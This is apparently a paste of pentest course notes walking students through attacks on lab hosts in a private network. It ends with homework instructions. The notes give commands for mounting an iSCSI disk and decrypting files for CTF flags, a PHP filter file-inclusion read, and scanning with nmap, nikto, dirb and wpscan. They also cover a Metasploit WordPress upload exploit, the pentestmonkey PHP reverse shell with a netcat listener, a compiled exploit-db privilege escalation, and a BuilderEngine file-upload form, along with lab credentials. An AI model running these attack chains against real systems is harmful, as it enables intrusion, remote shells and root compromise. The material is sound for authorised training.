  1125. sudo apt install open-iscsi
  1126.  
  1127. sudo iscsiadm -m discovery -t st -p 172.31.2.217
  1128.  
  1129. sudo iscsiadm -m discovery -t st -p 172.31.2.217:3260
  1130.  
  1131. sudo iscsiadm -m node -p 172.31.2.217 --login
  1132.  
  1133. sudo /bin/bash
  1134.  
  1135. fdisk -l
  1136. ***** look for /dev/sda5 - Linux swap / Solaris *******
  1137.  
  1138. mkdir /mnt/217vm
  1139.  
  1140. mount /dev/sdb /mnt/217vm
  1141.  
  1142. cd /mnt/217vm
  1143.  
  1144. ls
  1145.  
  1146. cat flag1.txt
  1147.  
  1148. file bobsdisk.dsk
  1149.  
  1150. mkdir /media/bobsdisk
  1151.  
  1152. mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk
  1153.  
  1154. /mnt/217vm# ls
  1155.  
  1156. cd /media/bobsdisk/
  1157.  
  1158. ls
  1159.  
  1160. cat ToAlice.eml
  1161.  
  1162. file bobsdisk.dsk
  1163.  
  1164. mkdir /media/bobsdisk
  1165.  
  1166. mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk
  1167.  
  1168. /mnt/217vm# ls
  1169.  
  1170. cd /media/bobsdisk/
  1171.  
  1172. ls
  1173.  
  1174. cat ToAlice.eml
  1175.  
  1176. file ToAlice.csv.enc
  1177.  
  1178. file bobsdisk.dsk
  1179.  
  1180. pwd
  1181.  
  1182. mkdir /media/bobsdisk
  1183.  
  1184.  
  1185. mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk
  1186.  
  1187. ls
  1188.  
  1189. cd /media/bobsdisk/
  1190.  
  1191. ls
  1192.  
  1193. openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
  1194.  
  1195. ls
  1196.  
  1197. cat ToAlice.eml | grep flag
  1198.  
  1199. openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
  1200.  
  1201. ls
  1202.  
  1203. cat ToAlice.eml
  1204. ***** look for supercalifragilisticoespialidoso ******
  1205.  
  1206. openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
  1207.  
  1208. supercalifragilisticoespialidoso
  1209.  
  1210.  
  1211. ls
  1212.  
  1213. cat ToAlice.csv
  1214. -----------------------------------------------------------------------
  1215.  
  1216. -----------------------------------------------------
  1217. Web Path,Reason
  1218. 5560a1468022758dba5e92ac8f2353c0,Black hoodie. Definitely a hacker site!
  1219. c2444910794e037ebd8aaf257178c90b,Nice clean well prepped site. Nothing of interest here.
  1220. flag3{2cce194f49c6e423967b7f72316f48c5caf46e84},The strangest URL I've seen? What is it?
  1221.  
  1222. -----------------------------------------------------
  1223.  
  1224. The hints are "Web Path" and "strangest URL" so let's try the long strings in the URL:
  1225. http://172.31.2.217/5560a1468022758dba5e92ac8f2353c0/
  1226. -- view source
  1227.  
  1228. Found this string in the source:
  1229. R2VvcmdlIENvc3RhbnphOiBbU291cCBOYXppIGdpdmVzIGhpbSBhIGxvb2tdIE1lZGl1bSB0dXJr
  1230. ZXkgY2hpbGkuIApbaW5zdGFudGx5IG1vdmVzIHRvIHRoZSBjYXNoaWVyXSAKSmVycnkgU2VpbmZl
  1231. bGQ6IE1lZGl1bSBjcmFiIGJpc3F1ZS4gCkdlb3JnZSBDb3N0YW56YTogW2xvb2tzIGluIGhpcyBi
  1232. YWcgYW5kIG5vdGljZXMgbm8gYnJlYWQgaW4gaXRdIEkgZGlkbid0IGdldCBhbnkgYnJlYWQuIApK
  1233. ZXJyeSBTZWluZmVsZDogSnVzdCBmb3JnZXQgaXQuIExldCBpdCBnby4gCkdlb3JnZSBDb3N0YW56
  1234. YTogVW0sIGV4Y3VzZSBtZSwgSSAtIEkgdGhpbmsgeW91IGZvcmdvdCBteSBicmVhZC4gClNvdXAg
  1235. TmF6aTogQnJlYWQsICQyIGV4dHJhLiAKR2VvcmdlIENvc3RhbnphOiAkMj8gQnV0IGV2ZXJ5b25l
  1236. IGluIGZyb250IG9mIG1lIGdvdCBmcmVlIGJyZWFkLiAKU291cCBOYXppOiBZb3Ugd2FudCBicmVh
  1237. ZD8gCkdlb3JnZSBDb3N0YW56YTogWWVzLCBwbGVhc2UuIApTb3VwIE5hemk6ICQzISAKR2Vvcmdl
  1238. IENvc3RhbnphOiBXaGF0PyAKU291cCBOYXppOiBOTyBGTEFHIEZPUiBZT1UK
  1239.  
  1240. ------ https://www.base64decode.org/ -------
  1241. ------ Decoded, but didn't find a flag -----
  1242.  
  1243.  
  1244. http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/
  1245. -- view source --
  1246. -- Nothing in source --
  1247.  
  1248. Browsed to the flag link:
  1249. view-source:http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=flag
  1250. -- view source --
  1251. -- Nothing in source --
  1252.  
  1253.  
  1254. Tried a PHP base64 decode with the URL:
  1255. http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=welcome.php
  1256. http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php
  1257. http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=party.php
  1258.  
  1259. ------ https://www.base64decode.org/ -------
  1260. Use the string found here:
  1261. http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php
  1262.  
  1263. -------------------------------------------------------------------
  1264. PD9waHAKZGVmaW5lZCAoJ1ZJQUlOREVYJykgb3IgZGllKCdPb29vaCEgU28gY2xvc2UuLicpOwo/Pgo8aDE+RmxhZzwvaDE+CjxwPkhtbS4gTG9va2luZyBmb3IgYSBmbGFnPyBDb21lIG9uLi4uIEkgaGF2ZW4ndCBtYWRlIGl0IGVhc3kgeWV0LCBkaWQgeW91IHRoaW5rIEkgd2FzIGdvaW5nIHRvIHRoaXMgdGltZT88L3A+CjxpbWcgc3JjPSJ0cm9sbGZhY2UucG5nIiAvPgo8P3BocAovLyBPaywgb2suIEhlcmUncyB5b3VyIGZsYWchIAovLwovLyBmbGFnNHs0ZTQ0ZGIwZjFlZGMzYzM2MWRiZjU0ZWFmNGRmNDAzNTJkYjkxZjhifQovLyAKLy8gV2VsbCBkb25lLCB5b3UncmUgZG9pbmcgZ3JlYXQgc28gZmFyIQovLyBOZXh0IHN0ZXAuIFNIRUxMIQovLwovLyAKLy8gT2guIFRoYXQgZmxhZyBhYm92ZT8gWW91J3JlIGdvbm5hIG5lZWQgaXQuLi4gCj8+Cg==
  1265. -------------------------------------------------------------------
  1266. <?php
  1267. defined ('VIAINDEX') or die('Ooooh! So close..');
  1268. ?>
  1269. <h1>Flag</h1>
  1270. <p>Hmm. Looking for a flag? Come on... I haven't made it easy yet, did you think I was going to this time?</p>
  1271. <img src="trollface.png" />
  1272. <?php
  1273. // Ok, ok. Here's your flag!
  1274. //
  1275. // flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}
  1276. //
  1277. // Well done, you're doing great so far!
  1278. // Next step. SHELL!
  1279. //
  1280. //
  1281. // Oh. That flag above? You're gonna need it...
  1282. ?>
  1283.  
  1284. ######################
  1285. # Attacking Minotaur #
  1286. ######################
  1287.  
  1288. Step 1: Portscan/Bannergrab the target host
  1289. ---------------------------Type This-----------------------------------
  1290. sudo nmap -sV 172.31.2.117
  1291. -----------------------------------------------------------------------
  1292.  
  1293.  
  1294.  
  1295. Step 2: Vulnerability scan the web server
  1296. ---------------------------Type This-----------------------------------
  1297. cd ~/toolz/
  1298.  
  1299. rm -rf nikto*
  1300.  
  1301. git clone https://github.com/sullo/nikto.git Nikto2
  1302.  
  1303. cd ~/toolz/Nikto2/program
  1304.  
  1305. perl nikto.pl -h 172.31.2.117
  1306. -----------------------------------------------------------------------
  1307.  
  1308.  
  1309.  
  1310. Step 3: Directory brute-force the webserver
  1311. ---------------------------Type This-----------------------------------
  1312. cd ~/toolz
  1313.  
  1314. git clone https://github.com/v0re/dirb.git
  1315.  
  1316. cd dirb/
  1317.  
  1318. ./configure
  1319.  
  1320. make
  1321.  
  1322. dirb
  1323.  
  1324. ./dirb http://172.31.2.117 wordlists/big.txt
  1325. -----------------------------------------------------------------------
  1326.  
  1327. ### dirb output ###
  1328. ==> DIRECTORY: http://172.31.2.117/bull/
  1329. -----------------------------------------------------------------------
  1330.  
  1331.  
  1332. Step 4: Run wordpress vulnerability scanner
  1333. ---------------------------Type This-----------------------------------
  1334. sudo apt-get install -y libcurl4-openssl-dev libxml2 libxml2-dev libxslt1-dev ruby-dev build-essential libgmp-dev zlib1g-dev
  1335.  
  1336. cd ~/toolz
  1337.  
  1338. rm -rf wpsca*
  1339.  
  1340. git clone https://github.com/wpscanteam/wpscan.git
  1341.  
  1342. cd wpscan
  1343.  
  1344. sudo gem install bundler && bundle install --without test development
  1345.  
  1346. rbenv install 2.5.0-dev
  1347.  
  1348. ruby wpscan.rb -u http://172.31.2.117/bull/ --enumerate u
  1349. -----------------------------------------------------------------------
  1350.  
  1351.  
  1352.  
  1353.  
  1354. Step 5: Attack vulnerable Wordpress plugin with Metasploit
  1355. ---------------------------Type This-----------------------------------
  1356. cd ~/toolz/metasploit
  1357.  
  1358. ./msfconsole
  1359.  
  1360. use exploit/unix/webapp/wp_slideshowgallery_upload
  1361.  
  1362. set RHOST 172.31.2.117
  1363.  
  1364. set RPORT 80
  1365.  
  1366. set TARGETURI /bull
  1367.  
  1368. set WP_USER bully
  1369.  
  1370. set WP_PASSWORD Bighornedbulls
  1371.  
  1372. exploit
  1373. -----------------------------------------------------------------------
  1374.  
  1375. Damn...that didn't work...Can't reverse shell from inside the network to a host in the VPN network range.
  1376. This is a lab limitation that I implemented to stop students from compromising hosts in the lab network
  1377. and then from the lab network attacking other students.
  1378.  
  1379.  
  1380. ---------------------------Type This-----------------------------------
  1381. wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
  1382.  
  1383. tar -zxvf php-reverse-shell-1.0.tar.gz
  1384.  
  1385. cd ~/toolz/php-reverse-shell-1.0/
  1386.  
  1387. nano php-reverse-shell.php
  1388. -----------------------------------------------------------------------
  1389. ***** change the $ip and $port variables to a host that you have already compromised in the network
  1390. ***** for this example I chose 172.31.2.64 and kept port 1234
  1391.  
  1392.  
  1393. ---------------------------Type This-----------------------------------
  1394. chmod 777 php-reverse-shell.php
  1395. cp php-reverse-shell.php ..
  1396. -----------------------------------------------------------------------
  1397.  
  1398.  
  1399.  
  1400. ----------- Paste this into a new file called wp_gallery_slideshow_146_suv.py -----------
  1401. https://www.exploit-db.com/raw/34681/
  1402.  
  1403. python wp_gallery_slideshow_146_suv.py -t http://172.31.2.117/bull/ -u bully -p Bighornedbulls -f php-reverse-shell.php
  1404.  
  1405. -----------------------------------------------------------------------
  1406.  
  1407.  
  1408.  
  1409. Set up netcat listener on previously compromised host
  1410. ---------------------------Type This-----------------------------------
  1411. ssh -l webmin 172.31.2.64
  1412. webmin1980
  1413.  
  1414. python -c 'import pty;pty.spawn("/bin/bash")'
  1415.  
  1416.  
  1417. cd /tmp
  1418.  
  1419. ./boom2
  1420.  
  1421. nc -lvp 1234
  1422. -----------------------------------------------------------------------
  1423.  
  1424.  
  1425.  
  1426.  
  1427. ---------------------Type This in your browser ------------------------
  1428. http://172.31.2.117/bull//wp-content/uploads/slideshow-gallery/php-reverse-shell.php
  1429. -----------------------------------------------------------------------
  1430.  
  1431.  
  1432. Now check your listener to see if you got the connection
  1433. ---------------------------Type This-----------------------------------
  1434. id
  1435.  
  1436. /sbin/ifconfig
  1437.  
  1438. python -c 'import pty;pty.spawn("/bin/bash")'
  1439.  
  1440. ---------------------------Type This-----------------------------------
  1441. cd /tmp
  1442. cat >> exploit2.c << out
  1443. -----------------------------------------------------------------------
  1444. **************paste in the content from here *****************
  1445. https://www.exploit-db.com/raw/37292/
  1446.  
  1447. **************hit enter a few times *****************
  1448.  
  1449. ---------------------------Type This-----------------------------------
  1450. out
  1451.  
  1452.  
  1453. gcc -o boom2 exploit2.c
  1454.  
  1455. ./boom2
  1456.  
  1457. id
  1458. -----------------------------------------------------------------------
  1459.  
  1460. ......YEAH - do the happy dance!!!!
  1461.  
  1462.  
  1463.  
  1464.  
  1465.  
  1466. ##################
  1467. # Attacking Sedna #
  1468. ###################
  1469.  
  1470. Attack steps:
  1471. -------------
  1472.  
  1473.  
  1474.  
  1475. Step 1: Ping sweep the target network
  1476. ---------------------------Type This-----------------------------------
  1477. nmap -sP 172.31.2.0/24
  1478. -----------------------------------------------------------------------
  1479.  
  1480.  
  1481.  
  1482.  
  1483.  
  1484.  
  1485. Step 2: Port scan/Bannergrab the target host
  1486. ---------------------------Type This-----------------------------------
  1487. sudo nmap -sV 172.31.2.86
  1488. -----------------------------------------------------------------------
  1489.  
  1490.  
  1491. PORT STATE SERVICE VERSION
  1492. 22/tcp open ssh (protocol 2.0)
  1493. 53/tcp open domain ISC BIND 9.9.5-3-Ubuntu
  1494. 80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
  1495. 110/tcp open pop3 Dovecot pop3d
  1496. 111/tcp open rpcbind 2-4 (RPC #100000)
  1497. 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: SEDNA)
  1498. 143/tcp open imap Dovecot imapd
  1499. 445/tcp open netbios-ssn Samba smbd 3.X (workgroup: SEDNA)
  1500. 514/tcp filtered shell
  1501. 993/tcp open ssl/imap Dovecot imapd
  1502. 995/tcp open ssl/pop3 Dovecot pop3d
  1503. 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
  1504. 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
  1505. SF-Port22-TCP:V=6.40%I=7%D=1/26%Time=5A6B4540%P=x86_64-pc-linux-gnu%r(NULL
  1506. SF:,29,"SSH-2\.0-OpenSSH_6\.6\.1p1\x20Ubuntu-2ubuntu2\r\n");
  1507.  
  1508. Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
  1509. Nmap done: 1 IP address (1 host up) scanned in 246.11 seconds
  1510.  
  1511.  
  1512.  
  1513.  
  1514.  
  1515.  
  1516.  
  1517.  
  1518.  
  1519. Step 3: Vulnerability scan the webserver ports
  1520. ---------------------------Type This-----------------------------------
  1521. cd ~/toolz/
  1522.  
  1523. rm -rf nikto*
  1524.  
  1525. git clone https://github.com/sullo/nikto.git Nikto2
  1526.  
  1527. cd Nikto2/program
  1528.  
  1529. perl nikto.pl -h 172.31.2.86
  1530.  
  1531. perl nikto.pl -h 172.31.2.86:8080
  1532. -----------------------------------------------------------------------
  1533.  
  1534.  
  1535.  
  1536.  
  1537.  
  1538. Step 4: Perform directory bruteforce against the target host
  1539. ---------------------------Type This-----------------------------------
  1540. wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl
  1541.  
  1542. perl Webr00t.pl -h 172.31.2.86 -v
  1543. -----------------------------------------------------------------------
  1544.  
  1545.  
  1546.  
  1547. or with dirbuster (dirb)
  1548.  
  1549.  
  1550.  
  1551.  
  1552. ---------------------------Type This-----------------------------------
  1553. cd ~/toolz
  1554.  
  1555. git clone https://github.com/v0re/dirb.git
  1556.  
  1557. cd dirb/
  1558.  
  1559. ./configure
  1560.  
  1561. make
  1562.  
  1563. dirb
  1564.  
  1565. ./dirb http://172.31.2.86 wordlists/big.txt
  1566. -----------------------------------------------------------------------
  1567.  
  1568. ### dirb output ###
  1569. ==> DIRECTORY: http://172.31.2.86/blocks/
  1570. ==> DIRECTORY: http://172.31.2.86/files/
  1571. ==> DIRECTORY: http://172.31.2.86/modules/
  1572. ==> DIRECTORY: http://172.31.2.86/system/
  1573. ==> DIRECTORY: http://172.31.2.86/themes/
  1574.  
  1575. + http://172.31.2.86/robots.txt (CODE:200|SIZE:36)
  1576. + http://172.31.2.86/server-status (CODE:403|SIZE:291)
  1577. ### dirb output ###
  1578.  
  1579.  
  1580.  
  1581.  
  1582.  
  1583. Browsed each of the directories and found that inside of the /themes folder contained the vulnerable application Builder Engine 3.5.0
  1584.  
  1585. An exploit for this application can be found at:
  1586. https://www.exploit-db.com/exploits/40390/
  1587.  
  1588.  
  1589.  
  1590.  
  1591.  
  1592. -------------------save this a "BuilderEngine.html"-------------------
  1593. <html>
  1594. <body>
  1595. <form method="post" action="http://172.31.2.86/themes/dashboard/assets/plugins/jquery-file-upload/server/php/"
  1596.  
  1597. enctype="multipart/form-data">
  1598. <input type="file" name="files[]" />
  1599. <input type="submit" value="send" />
  1600. </form>
  1601. </body>
  1602. </html>
  1603. -----------------------------------------------------------------------
  1604.  
  1605.  
  1606. Download this webshell (http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz) to your local machine.
  1607.  
  1608. Change the IP address in the source code of the webshell to another server in the lab network that you have root access to.
  1609.  
  1610. On the other server run:
  1611. nc -lvp 1234
  1612.  
  1613. Then upload the pentestmonkey reverseshell to .86
  1614.  
  1615. ============================================ Attacking another server because I need a reverse shell =========================================
  1616.  
  1617. ##################
  1618. # Day 1 Homework #
  1619. ##################
  1620. Send Ivana an email ivana{a-t}strategicsec{d-o-t}.com with a word document that contains screenshots of everything that we have covered so far. Make the subject of the email "First Name - Last Name - CyberWar Day 1" (ex: Joseph - McCray - CyberWar Day 1).
  1621.  
  1622. Also be sure to name the attached file "FirstName.LastName.CyberwarDay1.docx" (Joseph.McCray.CyberWarDay1.docx).
  1623.  
  1624. NOTE: This is what is required in order to receive your certificate of completion and CPEs.
Add Comment
Please, Sign In to add comment